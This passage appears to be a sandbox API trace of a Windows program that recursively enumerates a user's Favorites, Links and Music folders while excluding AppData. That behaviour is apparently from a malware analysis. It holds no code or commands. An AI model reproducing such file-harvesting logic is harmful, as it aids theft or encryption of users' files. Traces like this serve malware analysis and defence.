dwReserved1=0x777648, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0029.045] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0029.046] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0029.047] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0029.047] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0029.048] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1340057, ftCreationTime.dwLowDateTime=0x36bd92, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x12c0058, nFileSizeHigh=0x36bd92, nFileSizeLow=0x2b, dwReserved0=0x770000, dwReserved1=0x777648, cFileName="j\x08", cAlternateFileName="᷈{jဓĩ\x10")) returned 0 [0029.051] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.061] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0029.061] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.061] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSN Websites", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0029.061] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.061] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.068] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.068] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0029.087] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0029.107] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0029.107] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0029.107] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0029.107] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0029.107] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1340057, ftCreationTime.dwLowDateTime=0x36be1c, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1420058, nFileSizeHigh=0x36be1c, nFileSizeLow=0x889f10, dwReserved0=0x10, dwReserved1=0x777648, cFileName="MS\x08", cAlternateFileName="᷈{jဓĩ\x10")) returned 0 [0029.107] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.108] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="Windows Live", cAlternateFileName="WINDOW~1")) returned 1 [0029.108] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.108] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Windows Live", cchCount1=12, lpString2="AppData", cchCount2=7) returned 3 [0029.108] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.108] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\*", lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2200 [0029.118] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.118] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae030 | out: lpFindFileData=0x6ae030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="Get Windows Live.url", cAlternateFileName="GETWIN~1.URL")) returned 1 [0029.118] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Windows Live Gallery.url", cAlternateFileName="WINDOW~2.URL")) returned 1 [0029.118] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Windows Live Mail.url", cAlternateFileName="WINDOW~1.URL")) returned 1 [0029.118] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0029.118] FindNextFileW (in: hFindFile=0x7c2200, lpFindFileData=0x6ae018 | out: lpFindFileData=0x6ae018*(dwFileAttributes=0x1340057, ftCreationTime.dwLowDateTime=0x36be8c, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x1100058, nFileSizeHigh=0x36be8c, nFileSizeLow=0x7b5980, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Wi\x08", cAlternateFileName="᷈{jဓĩ\x10")) returned 0 [0029.118] FindClose (in: hFindFile=0x7c2200 | out: hFindFile=0x7c2200) returned 1 [0029.119] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x1120068, ftCreationTime.dwLowDateTime=0x36bea4, ftCreationTime.dwHighDateTime=0x777648, ftLastAccessTime.dwLowDateTime=0x36be8f, ftLastAccessTime.dwHighDateTime=0x8, ftLastWriteTime.dwLowDateTime=0x1336310, ftLastWriteTime.dwHighDateTime=0x1320069, nFileSizeHigh=0x36bea4, nFileSizeLow=0x777338, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="盈w\x08", cAlternateFileName="᪀{jဓĩ\x10")) returned 0 [0029.119] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.119] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77744c, dwReserved1=0x777648, cFileName="Links", cAlternateFileName="")) returned 1 [0029.119] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.119] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Links", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0029.119] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.120] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.120] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.120] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0029.125] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0029.125] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0029.125] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x10, dwReserved1=0x777648, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0029.125] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x1120068, ftCreationTime.dwLowDateTime=0x36bf14, ftCreationTime.dwHighDateTime=0x6cf858, ftLastAccessTime.dwLowDateTime=0x77391ecd, ftLastAccessTime.dwHighDateTime=0x74852d, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1040069, nFileSizeHigh=0x36bf14, nFileSizeLow=0x8894f0, dwReserved0=0x10, dwReserved1=0x777648, cFileName="Re\x08", cAlternateFileName="ᨰ{jဓĩ\x10")) returned 0 [0029.125] FindClose (in: hFindFile=0x7c2140 | out: hFindFile=0x7c2140) returned 1 [0029.125] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x777648, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0029.125] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Local Settings", cchCount1=14, lpString2="AppData", cchCount2=7) returned 3 [0029.125] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.125] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x7734e0d2, ftCreationTime.dwLowDateTime=0x889ec8, ftCreationTime.dwHighDateTime=0x60, ftLastAccessTime.dwLowDateTime=0x1, ftLastAccessTime.dwHighDateTime=0x889a86, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x9ec020c, nFileSizeHigh=0x33c415, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="", cAlternateFileName="ᨰ{jဓĩ\x10")) returned 0xffffffff [0029.125] FindNextFileW (in: hFindFile=0x7c2080, lpFindFileData=0x6ae4c8 | out: lpFindFileData=0x6ae4c8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f74bc50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f74bc50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ae794, dwReserved1=0x777648, cFileName="Music", cAlternateFileName="")) returned 1 [0029.125] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0029.125] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music", cchCount1=5, lpString2="AppData", cchCount2=7) returned 3 [0029.125] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0029.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f74bc50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f74bc50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName=".", cAlternateFileName="")) returned 0x7c2140 [0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9f74bc50, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9f74bc50, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="..", cAlternateFileName="")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae288 | out: lpFindFileData=0x6ae288*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49f11b00, ftCreationTime.dwHighDateTime=0x1d5c549, ftLastAccessTime.dwLowDateTime=0x61550420, ftLastAccessTime.dwHighDateTime=0x1d5c100, ftLastWriteTime.dwLowDateTime=0x61550420, ftLastWriteTime.dwHighDateTime=0x1d5c100, nFileSizeHigh=0x0, nFileSizeLow=0x1143, dwReserved0=0x2020e02, dwReserved1=0x777648, cFileName="0_h8M557-V1.mp3", cAlternateFileName="0_H8M5~1.MP3")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x2c45c810, ftLastWriteTime.dwHighDateTime=0x1d5c5b9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x10, dwReserved1=0x777648, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c44c280, ftCreationTime.dwHighDateTime=0x1d5bfdf, ftLastAccessTime.dwLowDateTime=0xed260310, ftLastAccessTime.dwHighDateTime=0x1d5bd12, ftLastWriteTime.dwLowDateTime=0xed260310, ftLastWriteTime.dwHighDateTime=0x1d5bd12, nFileSizeHigh=0x0, nFileSizeLow=0x1187d, dwReserved0=0x10, dwReserved1=0x777648, cFileName="4RuKxK6SJcR.mp3", cAlternateFileName="4RUKXK~1.MP3")) returned 1 [0029.126] FindNextFileW (in: hFindFile=0x7c2140, lpFindFileData=0x6ae270 | out: lpFindFileData=0x6ae270*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f5e1710, ftCreationTime.dwHighDateTime=0x1d5c192, ftLastAccessTime.dwLowDateTime=0x965cd70, ftLastAccessTime.dwHighDateTime=0x1d5c0e8, ftLastWriteTime.dwLowDateTime=0x965cd70, ftLastWriteTime.dwHighDateTime=0x1d5c0e8, nFileSizeHigh=0x0, nFileSizeLow=0x187d4, dwReserved0=0x10, dwReserved1=0x777648, cFileName="5kW9-9BV3.m4a", cAlternateFileName="5KW9-9~1.M4A")) returned 1 